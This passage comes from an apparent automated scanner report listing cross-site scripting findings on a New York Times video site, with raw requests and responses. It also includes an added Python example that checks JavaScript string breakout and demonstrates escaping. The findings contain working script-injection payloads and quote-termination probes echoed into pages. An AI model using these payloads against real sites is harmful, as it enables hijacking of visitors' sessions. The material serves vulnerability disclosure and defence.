<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytworld4e929";c83276095a3";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "world4e929";c83276095a3";
var s_prop2 = "asia";
var s_prop1 = "multimedia";
</script>
...[SNIP]...
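Findings 3.318 and 3.319 above show the same path segment landing in a single-quoted and a double-quoted JavaScript string, with the quote and the ; echoed as-is. The scanner stops at "the string can be terminated"; a practitioner wants to confirm that lexically and to see which encoding would have kept the value inside the literal. The block below is an added example, not code from the report or from the site: SINGLE and DOUBLE are constructed to mirror the getShareSectionDisplay() and s_channel lines shown above, js_string_escape is a hypothetical server-side helper, and decode_literal is a minimal JS string-literal reader (quotes, backslash escapes and \uXXXX), not a full lexer.

```python
"""JavaScript-string-context reflection for the REST URL parameter 5 findings.

Added example, not code from the XSS.CX report or from video.nytimes.com.
SINGLE and DOUBLE are constructed to mirror the getShareSectionDisplay()
and s_channel lines in the report; js_string_escape is a hypothetical
server-side helper; decode_literal is a minimal JS string-literal reader
(quotes, backslash escapes and \\uXXXX), not a full lexer.
"""
from urllib.parse import unquote

# Constructed mirrors of the two script contexts in findings 3.318 and 3.319.
SINGLE = "function getShareSectionDisplay() {{\nreturn( '{v}' );\n}}"
DOUBLE = 'var s_channel = "{v}";'

# Escapes that keep any value inside a JS string literal. < > / & are included
# because an inline <script> block ends at the first </script> the HTML
# tokenizer sees, quoted or not. This is a conservative list; escaping every
# non-alphanumeric character is the stricter rule.
_JS_ESCAPES = {
    "\\": "\\\\", "'": "\\u0027", '"': "\\u0022", "<": "\\u003c",
    ">": "\\u003e", "/": "\\/", "&": "\\u0026",
    "\n": "\\n", "\r": "\\r", "\u2028": "\\u2028", "\u2029": "\\u2029",
}


def js_string_escape(value):
    return "".join(_JS_ESCAPES.get(ch, ch) for ch in value)


def render(template, section, escape=lambda s: s):
    """Build the script line. The default (no escaping) is the behaviour the
    report observed; pass js_string_escape for the hardened form."""
    return template.format(v=escape(section))


def decode_literal(src, open_idx):
    """Decode the string literal whose opening quote is at src[open_idx].
    Returns (decoded value, index of the closing quote)."""
    quote = src[open_idx]
    out, i = [], open_idx + 1
    while i < len(src) and src[i] != quote:
        if src[i] == "\\":
            nxt = src[i + 1]
            if nxt == "u":
                out.append(chr(int(src[i + 2:i + 6], 16)))
                i += 6
            else:
                out.append({"n": "\n", "r": "\r"}.get(nxt, nxt))
                i += 2
        else:
            out.append(src[i])
            i += 1
    return "".join(out), i


def breaks_out(script_src, echoed):
    """True if the verbatim-echoed payload closes the literal it was written
    into before the payload ends (the scanner's 'string can be terminated')."""
    pos = script_src.find(echoed)
    if pos < 0:
        return False  # not echoed unmodified, so this payload cannot break out
    open_idx = max(script_src.rfind("'", 0, pos), script_src.rfind('"', 0, pos))
    _, close_idx = decode_literal(script_src, open_idx)
    return close_idx < pos + len(echoed)


def literal_value(script_src):
    """Value of the first string literal in script_src, after JS decoding."""
    starts = [i for i in (script_src.find("'"), script_src.find('"')) if i >= 0]
    return decode_literal(script_src, min(starts))[0]


if __name__ == "__main__":
    for template, raw in ((SINGLE, "96257'%3be85a1e8f6a1"), (DOUBLE, '4e929"%3bc83276095a3')):
        payload = unquote(raw)        # the server decodes %3b to ; before echoing
        section = "world" + payload   # REST URL parameter 5 is "world" plus the payload
        vuln = render(template, section)
        print(vuln, "-> breaks out:", breaks_out(vuln, payload))
        hardened = render(template, section, js_string_escape)
        print(hardened, "-> breaks out:", breaks_out(hardened, payload),
              "| value intact:", literal_value(hardened) == section)
```

Escaping only the delimiting quote is not enough in this context: the value also sits inside an inline <script> element, so < and / have to be escaped too, which is why the table above covers them rather than relying on the quote style alone.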

3.320. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 376ae"%3b001983fed65 was submitted in the REST URL parameter 6. This input was echoed as 376ae";001983fed65 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/23/world/asia376ae"%3b001983fed65/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:35 GMT
Content-type: text/html
Content-Length: 242009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytworld";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "world";
var s_prop2 = "asia376ae";001983fed65";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.321. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91084'%3bc5f256392f0 was submitted in the REST URL parameter 6. This input was echoed as 91084';c5f256392f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/23/world/asia91084'%3bc5f256392f0/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:20:22 GMT
Content-type: text/html
Content-Length: 242009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
ds() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'world' );
}
function getShareSubSection() {
return( 'asia91084';c5f256392f0' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURIComponent( '' ) );
}
function getSharePubdate() {
r
...[SNIP]...

3.322. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8a2"><script>alert(1)</script>bd3f56b5186 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23/world/asia5f8a2"><script>alert(1)</script>bd3f56b5186/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:19 GMT
Content-type: text/html
Content-Length: 233687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23/world/asia5f8a2"><script>alert(1)</script>bd3f56b5186/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.323. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0938"><script>alert(1)</script>574cb9b6872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html?f0938"><script>alert(1)</script>574cb9b6872=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:13:12 GMT
Content-type: text/html
Content-Length: 241979

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html?f0938"><script>alert(1)</script>574cb9b6872=1">
...[SNIP]...

3.324. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3809"><script>alert(1)</script>a5021a67302 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010e3809"><script>alert(1)</script>a5021a67302/10/25/continuous/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:15:25 GMT
Content-type: text/html
Content-Length: 233672

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010e3809"><script>alert(1)</script>a5021a67302/10/25/continuous/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.325. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a8e"><script>alert(1)</script>8d76ccd81b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10c2a8e"><script>alert(1)</script>8d76ccd81b/25/continuous/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:03 GMT
Content-type: text/html
Content-Length: 233670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10c2a8e"><script>alert(1)</script>8d76ccd81b/25/continuous/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.326. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3a1"><script>alert(1)</script>c8f7feac5ae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/255e3a1"><script>alert(1)</script>c8f7feac5ae/continuous/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:27 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/255e3a1"><script>alert(1)</script>c8f7feac5ae/continuous/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.327. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30405"%3b9a4b8fb4adb was submitted in the REST URL parameter 5. This input was echoed as 30405";9a4b8fb4adb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/25/continuous30405"%3b9a4b8fb4adb/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:52 GMT
Content-type: text/html
Content-Length: 226232

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytcontinuous30405";9a4b8fb4adb";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "continuous30405";9a4b8fb4adb";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.328. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3df"><script>alert(1)</script>c5b30a54997 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/25/continuousfc3df"><script>alert(1)</script>c5b30a54997/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:43 GMT
Content-type: text/html
Content-Length: 226438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/25/continuousfc3df"><script>alert(1)</script>c5b30a54997/1248069237870/timescast-october-25-2010.html">
...[SNIP]...

3.329. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da116'%3b25c407da1e0 was submitted in the REST URL parameter 5. This input was echoed as da116';25c407da1e0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/25/continuousda116'%3b25c407da1e0/1248069237870/timescast-october-25-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:34 GMT
Content-type: text/html
Content-Length: 226232

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
nce%20to%20save%20art.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'continuousda116';25c407da1e0' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
